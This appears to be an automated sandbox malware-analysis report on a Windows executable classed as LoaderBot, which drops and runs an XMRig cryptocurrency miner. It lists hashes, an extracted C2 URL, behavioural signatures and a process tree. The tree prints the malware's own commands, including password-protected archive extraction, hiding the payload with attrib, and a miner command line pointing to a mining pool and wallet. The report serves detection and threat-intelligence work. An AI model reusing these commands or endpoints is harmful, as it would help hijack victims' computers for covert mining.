Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-12-2022 16:52

General

  • Target

    71f47605360c60769050baadca0a2591c034509e0264fab25fd772a6a67d9553.exe

  • Size

    4.2MB

  • MD5

    3c10a82315dff77af1026ebc85817d56

  • SHA1

    059d5ddf72fa0a37f83f7d57c069fec9461f2611

  • SHA256

    71f47605360c60769050baadca0a2591c034509e0264fab25fd772a6a67d9553

  • SHA512

    7f25dfbd926394d903a158f7345850f7cb7329b5afef5501e2a91623ea6833c2642db89550d02169ef1cc2458be30f19c2dc673f7747ac185c733ffcd92a614c

  • SSDEEP

    98304:Dg2UKMx7bVNlh4DzS3Sj9SbG80ojiDf7fNinIRx//3LtTs4z0izea4JJVy1s+BJ:Dg2UNbV7hV3KSSlJT/PLtN0iya4Jjy1T

Malware Config

Extracted

Family

loaderbot

C2

http://mrmax4td.beget.tech/cmd.php

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • LoaderBot executable 3 IoCs
  • XMRig Miner payload 2 IoCs
  • Executes dropped EXE 9 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\71f47605360c60769050baadca0a2591c034509e0264fab25fd772a6a67d9553.exe
    "C:\Users\Admin\AppData\Local\Temp\71f47605360c60769050baadca0a2591c034509e0264fab25fd772a6a67d9553.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4724
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\system32\mode.com
        mode 65,10
        3⤵
          PID:4392
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e file.zip -p145252031749632291841729614 -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:5044
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_6.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:440
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_5.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4812
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_4.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3844
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_3.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1664
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_1.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3160
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_2.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1784
        • C:\Windows\system32\attrib.exe
          attrib +H "kjhghfffffcghjjjjjkuiyt.exe"
          3⤵
          • Views/modifies file attributes
          PID:1980
        • C:\Users\Admin\AppData\Local\Temp\main\kjhghfffffcghjjjjjkuiyt.exe
          "kjhghfffffcghjjjjjkuiyt.exe"
          3⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Drops startup file
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1688
          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4Aqfi5yndcxjFRs1r3dfPjDZnPRfwGijhhYKjaz5NLbJRNwgHHYht1MV2coRC2npEY96NfaVRT4yNaA86TkTfBYzUKR1jyc -p x -k -v=0 --donate-level=0 -t 1
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3128

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

      Filesize

      2.1MB

      MD5

      dd33b7b115948a0fe3f3ae94bcc6a491

      SHA1

      e8b0706c781c642a75213fd8d50e22c2304249a5

      SHA256

      976ebc00a78f53f234ce5eda10b01bf92ec0f3c81f00b74dba9e97792ddc1aa0

      SHA512

      5e0f79756ca9ef76f48cece73a1d6016ab681afa2c3a98bde5e3c6da54418f51c77ce879dbe8abadd4d4da4e4791f25adb2001701157866df39dbe610d465a5d

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

      Filesize

      1.7MB

      MD5

      1edbac58e5d2af54fe42d3c659402cd9

      SHA1

      2d6f4f1783239b6c78275760556168815289923f

      SHA256

      14ab27a18c950e737deff5ff788fbba9d8be750e8caf943685fc31447f945dd0

      SHA512

      5fabc683b240957ead5785acc4eaa1c32ad0e61fcea7cdc03815a9a61084be50cdee497ce63936f5aa6d33d2a22671b457bfd862291119a014913384d9fbf9ab

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

      Filesize

      1.7MB

      MD5

      29b748d12a36d5571aa6e45e8989416a

      SHA1

      fab62e1924d671970e38ad445f5e18465cb2b5f8

      SHA256

      6df7c6d8346571044ad9ba5ab1c41aa121addd8e4e39689e4567d200bb2e9133

      SHA512

      aa4ca00a72fef1eb945a656c2f6863d1bb751753c4d37bf32299e6a6944a64616b02cc9016b6a0daa011975382519a3d9198b7d634a93f6c2cbd82c38039be80

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

      Filesize

      1.7MB

      MD5

      1a9c929aa7b42f830416f194cc5cb3b8

      SHA1

      c7ab51af9f30a58f9dab205684afb5807557fb20

      SHA256

      5c2055fec5593343426dd5d941b87cfca9fdac56080e135762aa9a71a69d14c3

      SHA512

      4990c0bf8b1016f13212901c887d9b43f8c9396cb3c3c04fdc74a1400a167114080ac044a56a0aaeec9785a9bda8e8454a18cf3e426286f7a22d51300c31c6f4

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

      Filesize

      1.7MB

      MD5

      0a8535d8d60e5765c730ab4924dbcfaa

      SHA1

      89b4f8db7d47ca4283ccee85bd17e3b0a20934a2

      SHA256

      86542a08223a341b42474711d6d37185aeed760cda5400c4e8da2a6cbe619ae5

      SHA512

      141a55ebc91bbb6a85acca115d9a625950adaea77be93425197b89de5a5d369b41e4324f1ab998e809fcecdc065462bda1429c99ce26ab7b9f1ae2304fab597e

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

      Filesize

      1.7MB

      MD5

      73483bc590129f328b13b7fe220cb072

      SHA1

      e2b8087980695881a49384c32dea2c61e391c0b1

      SHA256

      8e3bc8bbe73e61c959ced4744656c2e69db9a7f43c6eee6b8d2439e36f257ad8

      SHA512

      725e4d65435a4f2ece801bc48da4da4def59024ade9a90bc34148ce21868d74aeffe0ba5a93f00e3751a551b534b4584c8be0639b9799f1e8f648ddd1fe83afb

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

      Filesize

      3.2MB

      MD5

      c2e0e8fcdaf87178f4a814a9aff14226

      SHA1

      62eee75454d96041bdc02c82e47ccc10aeba26e7

      SHA256

      8f920919660e59c5cfcaf53a16918cd6758aa8017784675078471cedb48a62c8

      SHA512

      84cadc1bed93b5e692493f5e255d2ce2a94a8b9d4cf80578d1dc8c8074332f1a4b10b4245559b19944610c3790327c44f62c9d594ad9bebc5efc9e3074e55070

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\kjhghfffffcghjjjjjkuiyt.exe

      Filesize

      4.0MB

      MD5

      adc8831a1ca720028db3120e7325f537

      SHA1

      f2fd460cccfe764fbf623d0de8b9064d12c4235d

      SHA256

      3f8f82cc246266043b39729f99004dacc14ead06432e4c52198f967b0c84b7e9

      SHA512

      9e74b3ce63168e7e15ae57362f03641acfcbb86c2ef502a2e0834fff2dde8f7b6d16cdc860d1033d6279c3c3bc179168aedf0a8ca6e77233d953ee47c271216f

    • C:\Users\Admin\AppData\Local\Temp\main\file.bin

      Filesize

      3.2MB

      MD5

      45051af58922b80e74672e2ef53fd30a

      SHA1

      72bfb508eae4275365d2a6f156d06d11f032ea53

      SHA256

      23e04f51b9a9ed82801954e9414cf3d8340ef8a879f86f8b8bcd3cc8c3c2d55e

      SHA512

      66c2e44623bf73270f63fc84c43879cdc7a99dd84c744fa86697cdcd99a0a14539d3c5527ebacc2c544cd0f212e0f22f799835fd291efe2724fbbd286c1f3e41

    • C:\Users\Admin\AppData\Local\Temp\main\kjhghfffffcghjjjjjkuiyt.exe

      Filesize

      4.0MB

      MD5

      adc8831a1ca720028db3120e7325f537

      SHA1

      f2fd460cccfe764fbf623d0de8b9064d12c4235d

      SHA256

      3f8f82cc246266043b39729f99004dacc14ead06432e4c52198f967b0c84b7e9

      SHA512

      9e74b3ce63168e7e15ae57362f03641acfcbb86c2ef502a2e0834fff2dde8f7b6d16cdc860d1033d6279c3c3bc179168aedf0a8ca6e77233d953ee47c271216f

    • C:\Users\Admin\AppData\Local\Temp\main\main.bat

      Filesize

      543B

      MD5

      563bce4710d48d866e9b9150e1568a63

      SHA1

      cc4c9d1cbbac40700ec36ef27ac1525bd8034ef5

      SHA256

      323b31caa4d74659e1258023a546aa9931ad788f597aedcee0506bd450b7573a

      SHA512

      a27e4a02b8f02dab3f4eedbecdae8cbfc5ea2a98bae93216dafa66611b842a9bb3873e8e45a10a644f825a580eda0b32ae02ee06b94c46c5eb42cc342c20af56

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

      Filesize

      3.9MB

      MD5

      02569a7a91a71133d4a1023bf32aa6f4

      SHA1

      0f16bcb3f3f085d3d3be912195558e9f9680d574

      SHA256

      8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

      SHA512

      534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

      Filesize

      3.9MB

      MD5

      02569a7a91a71133d4a1023bf32aa6f4

      SHA1

      0f16bcb3f3f085d3d3be912195558e9f9680d574

      SHA256

      8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

      SHA512

      534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

    • memory/1688-169-0x0000000000510000-0x000000000090E000-memory.dmp

      Filesize

      4.0MB

    • memory/1688-170-0x0000000005560000-0x00000000055C6000-memory.dmp

      Filesize

      408KB

    • memory/3128-175-0x0000000140000000-0x0000000140B75000-memory.dmp

      Filesize

      11.5MB

    • memory/3128-174-0x00000000001D0000-0x00000000001E4000-memory.dmp

      Filesize

      80KB

    • memory/3128-176-0x0000000000400000-0x0000000000420000-memory.dmp

      Filesize

      128KB

    • memory/3128-177-0x0000000140000000-0x0000000140B75000-memory.dmp

      Filesize

      11.5MB

    • memory/3128-178-0x0000000000420000-0x0000000000440000-memory.dmp

      Filesize

      128KB

    • memory/3128-179-0x0000000000420000-0x0000000000440000-memory.dmp

      Filesize

      128KB